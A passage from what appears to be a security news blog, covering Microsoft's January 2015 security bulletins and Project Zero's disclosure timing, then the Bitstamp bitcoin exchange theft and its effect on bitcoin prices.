Virus.Win32.Slugin.a

It's always surprising to still see the viral stuff, but it's certainly more prevalent than telnet service exploitation at this point.

The other Security Bulletins are rated "Important", and the escalation of privilege issues are somewhat interesting and the kind of thing businesses should be aware of - they are frequently used as a part of target attack activity.

One of these EoP vulnerabilities was reported privately and exposed publicly by Google's Project Zero two days prior to the scheduled and known patch release. The project maintains a database of exploitable vulnerabilities, each of which has a deadline of 90 days from reporting before the bug goes public: "Deadline exceeded - automatically derestricting". This EoP was fixed and the fix released by Microsoft as MS015-003 on its scheduled "patch tuesday" release, two days after Google exposed their bug issue publicly. It's strange that Google would do such a thing, it's not as if Microsoft doesn't commit to reasonable time frames for fixes and proper testing anymore. Microsoft responded with a lengthy writeup on responsible disclosure and cooperation within the industry, and mentioned Google's approach in particular.

The flawed code has yet to be seen as abused in the wild, but it will likely happen. You can find a set of executive summaries for the Bulletins here.

And one last note, the Advanced Notification Service is coming to an end. Microsoft ended their practice of broadcasting advance notice of security updates to all customers, and offers it only to paying Premiere-level customers. For the most part, it seems that this works out just fine and possibly frustrates people less with security maintenance. However, I think that it would be useful for Microsoft to pre-release forecasted download file sizes and reboot requirements for the updates, along with their ratings of critical or not, etc. For example, knowing that I will have to download over 200mb of critical software updates requiring system reboots would be helpful. That information would be useful to their customers both large and small. Time will tell if they bring it back, but likely, they will not need to.

Bitcoin value plunges following $5M Bitstamp Heist

Thu, 01/08/2015 - 11:02

The new year has started rather badly for the Bitcoin world. On January 4th, a cyber-attack against Bitstamp, one of the biggest bitcoin exchanges in the world, resulted in the loss of almost 19,000 BTC - the equivalent of more than $5 million.

While very little is known at the moment about how the attackers managed to pull off this latest bitcoin heist, Bitstamp is assuring their customers that all of their bitcoins remain safe. The company states that "this breach represents a small fraction of Bitstamp's total bitcoin reserves", so hopefully covering the losses shouldn't be a problem for them.

Because of the irreversible nature of bitcoin transactions, the only thing Bitcoin enthusiasts can do right now is to sit and watch how the attackers are emptying the address used to collect the stolen bitcoins.

You can follow the thieves' transactions by yourself here: https://blockchain.info/address/1L2JsXHPMYuAa9ugvHGLwkdstCPUDemNCf

Right now, the attackers are most likely trying to move those bitcoins around through as many addresses as possible, and then will proceed to launder the stolen coins by using so-called "mixing" services

Bitstamp seems to have been much better prepared for such an incident compared to Mt. Gox, so while the price of Bitcoin was of course impacted, the impact was not that big. Part of the reason is that bitcoins are currently trading at prices that haven't been seen since the autumn of 2013 anyway, between $250 and $300 for 1 BTC.


Bitcoin price in 2014 - source: ZeroBlock

Taking into account these cyber attacks, we conclude that in 2015 security will continue to remain the most important thing for Bitcoin exchanges and enthusiasts.

Our advice is to diversify and try and minimize the time in which your bitcoins are hosted by anyone else except yourself. Bitcoin exchanges and third party wallet providers seem to act as a magnet for attackers, so it's better to take the security of your bitcoins in your own hands.

Make sure to check out our tips on How to Keep Your Bitcoins Safe.